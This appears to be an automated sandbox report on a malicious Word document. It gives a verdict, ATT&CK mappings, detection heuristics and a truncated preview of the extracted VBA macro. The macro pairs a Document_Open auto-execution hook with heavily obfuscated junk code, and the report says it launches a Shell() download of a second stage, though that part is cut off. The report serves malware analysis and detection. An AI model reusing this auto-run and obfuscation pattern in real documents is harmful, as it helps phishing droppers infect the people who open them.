Verdict: MALICIOUS
Risk score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute a 'Shell()' command, indicating an attempt to download and execute a second-stage payload. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', which is a common social engineering tactic to bypass macro security settings.
Heuristics (6)
- VBA macros detected (medium; 3 related findings; rule OLE_VBA_MACROS): Document contains VBA macro code.
- Shell() call in VBA (critical; rule OLE_VBA_SHELL): Shell() call in VBA.
- Document_Open macro (high; rule OLE_VBA_DOCOPEN): Document_Open macro.
- VBA p-code auto-exec with execution tokens (high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Macro/content-enable lure (medium; rule SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 69369 bytes | 646074da6e52c2c10c90f4dc256e944483d35f71cbe273d33a4db9bff88651ba |
Preview script (first 1,000 lines of the extracted script; the preview is truncated by the analyzer):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
    Set frm = New frmMain
    Call Hitler(frm.txtBox.Text)
End Sub

Attribute VB_Name = "Cgx8sRWwN"

Sub Hitler(FBFSEMs1)
    If 26 < 188 Then ' vseuO
    Else ' qcWVATBl
        MsgBox "FFbeR"
    End If
    If 26 < 188 Then ' rHAOyR
    Else ' ePSek4pc
        Debug.Print "dbkGIPwf"
    End If
    Dim QnbKS
    QnbKS = 95
    While QnbKS <= 556
        QnbKS = QnbKS + 31
    Wend
    lHpKNBJ = "ILXOw"
    uT4FtPu = v7p10Hd & QnbKS
    Dim vJ0Id
    vJ0Id = 124
    While vJ0Id < 658
        vJ0Id = vJ0Id + 61
    Wend
    kxUCP = "fC6NhvYW"
    mUE4uJV = vi1zjN8r & vJ0Id
    If 36 < 187 Then ' pBvVI0
    Else ' vuTcJm
        Debug.Print "kqdTa"
    End If
    If 39 < 145 Then ' Mu45mDga
    Else ' YCU7ZYkR
        MsgBox "BJGYOrZE"
    End If
    Dim h2StdGh
    h2StdGh = 210
    While h2StdGh < 841
        h2StdGh = h2StdGh + 44
    Wend
    zCaQKLt3Z = "m8iy6"
    HW2YxE0y = Ia4x8iV & h2StdGh
    If 9915 / 15 = 1243 - 1232 Then
        Zy4Ebp = "YVoFD3mex"
    End If
    einZEHfRh = 56269
    tGMhRnx7 = Zy4Ebp & einZEHfRh
    Dim kImGlL5TF
    kImGlL5TF = 210
    While kImGlL5TF < 841
        kImGlL5TF = kImGlL5TF + 44
    Wend
    T0E2RAPuB = 56269
    wDgem9NQW = D5Lc4pa & kImGlL5TF
    If 14 < 160 Then ' BiGOF
    Else ' De362p
        Debug.Print "wag4lR2J"
    End If
    Dim dNyUK
    dNyUK = 192
    While dNyUK <= 593
        dNyUK = dNyUK + 48
    Wend
    vzrg45WjQ = 52677
    mJCoVs = V6yUTVB & dNyUK
    If 8008 / 8 = 1478 - 1465 Then
        NIlFdZWT = "UQMuy0j"
    End If
    SQv0cS = 52677
    LgRld9cF4 = NIlFdZWT & SQv0cS
    If 29928 / 86 = 13680 / 13680 Then
        xJLGzfH = "yviKdSo"
    End If
    aB03PqR = "E15gc"
    sdxZ9 = xJLGzfH & aB03PqR
    If 48 < 237 Then ' AF7V9d4
    Else ' IGRpw
        MsgBox "oBIesQH"
    End If
    If 29928 / 86 = 13680 / 13680 Then
        FCgPdEte = "nHJQNU9L"
    End If
    m6xHl2YmJ = "NiDLG"
    fw6trliJ7 = FCgPdEte & m6xHl2YmJ
    If 28512 / 132 = 2312 - 2311 Then
        Cfly3wrbJ = "x0ODk"
    End If
    QbERAS = "JQFJuO9fy"
    bpSxfDHsm = Cfly3wrbJ & QbERAS
    Dim ShFSs
    ShFSs = 211
    While ShFSs < 865
        ShFSs = ShFSs + 52
    Wend
    ht8JR45B = 5683
    M5F8YHC0X = bNfIop1yd & ShFSs
    If 15 < 195 Then ' lBLuvnQU
    Else ' yRmjVJn
        Debug.Print "cSA2Ua0"
    End If
    Dim O3trl4SsO
    O3trl4SsO = 0
    While O3trl4SsO < 660
        O3trl4SsO = O3trl4SsO + 54
    Wend
    qQaeTON = 30678
    Haw2vc = egLm9FCVZ & O3trl4SsO
    Dim cU8m5n4qk
    cU8m5n4qk = 95
    While cU8m5n4qk < 298
        cU8m5n4qk = cU8m5n4qk + 52
    Wend
    rjV05xZMI = 10216
    ZPJAKXx = ykNpD & cU8m5n4qk
    If 36 < 181 Then ' AD3s5
    Else ' cJQre
        MsgBox "OA5MGBLY"
    End If
    If 18900 / 35 = 1498 - 1483 Then
        ZGVD7pk = "tLkpj1ur"
    End If
    ek0boR2W = 54797
    awmDC1is = ZGVD7pk & ek0boR2W
    If 53 < 249 Then ' KNIDt16s
    Else ' s0AEPi
        MsgBox "QsbHTDLMi"
    End If
    If 27 < 184 Then ' cR1DCXtch
    Else ' fMXKQjYf
        MsgBox "azKYexb"
    End If
    If 27 < 184 Then ' eY6uhl
    Else ' m2Xd0Bl
        Debug.Print "HJmoqH9"
    End If
    Dim fxegGX
    fxegGX = 244
    While fxegGX < 445
        fxegGX = fxegGX + 27
    Wend
    uoy58p = "Zf94Rv"
    BOwR4 = YDKxtoJ & fxegGX
    If 755 * 1 = 31738 / 2267 Then
        fkXiboWGy = "XHWLt4Qi"
    End If
    WPUWdemAu = 45903
    O4cPd16 = fkXiboWGy & WPUWdemAu
    If 755 * 1 = 31738 / 2267 Then
        v1EVLD = "JufsK3t"
    End If
    xJ1km = 45903
    AFRH9x = v1EVLD & xJ1km
    If 3724 / 133 = -4833 + 4836 Then
        btkjLYnrD = "dZwH5oc"
    End If
    iU92C3 = 28948
    S9Kp4RX5S = btkjLYnrD & iU92C3
    Dim NRypK
    NRypK = 46
    While NRypK <= 515
        NRypK = NRypK + 16
    Wend
    Ko6Os = "J5n1Vtrd"
    n4EMNv9eC = PWmjiqw & NRypK
    Dim ul3cb
    ul3cb = 46
    While ul3cb < 515
        ul3cb = ul3cb + 16
    Wend
    Zeb4HpS = "GB0wvT78"
    I5Gqu = tygRD & ul3cb
    Dim mGNhkadL
    mGNhkadL = 236
    While mGNhkadL < 1016
        mGNhkadL = mGNhkadL + 24
    Wend
    Uy8DXKls = "UWNondcv"
    Q60X5k = CnwrDGPIt & mGNhkadL
    Dim DSBPL
    DSBPL = 236
    While DSBPL <= 1016
        DSBPL = DSBPL + 24
    Wend
    Sw6nI = "OWd4qa9p"
    wjx2FDT = bXP5sN1 & DSBPL
    If 6384 / 12 = 1037 - 1036 Then
        XdWipm = "NEqMB6"
    End If
    e5Jl37R = "ecpoe4Lab"
    EaiPKlg8 = XdWipm & e5Jl37R
    Dim ogjVBdoWC
    ogjVBdoWC = 236
    While ogjVBdoWC < 1016
        ogjVBdoWC = ogjVBdoWC + 24
    Wend
    hvl78 = "pAUqiB1d"
    ijJW6d ... (truncated)
```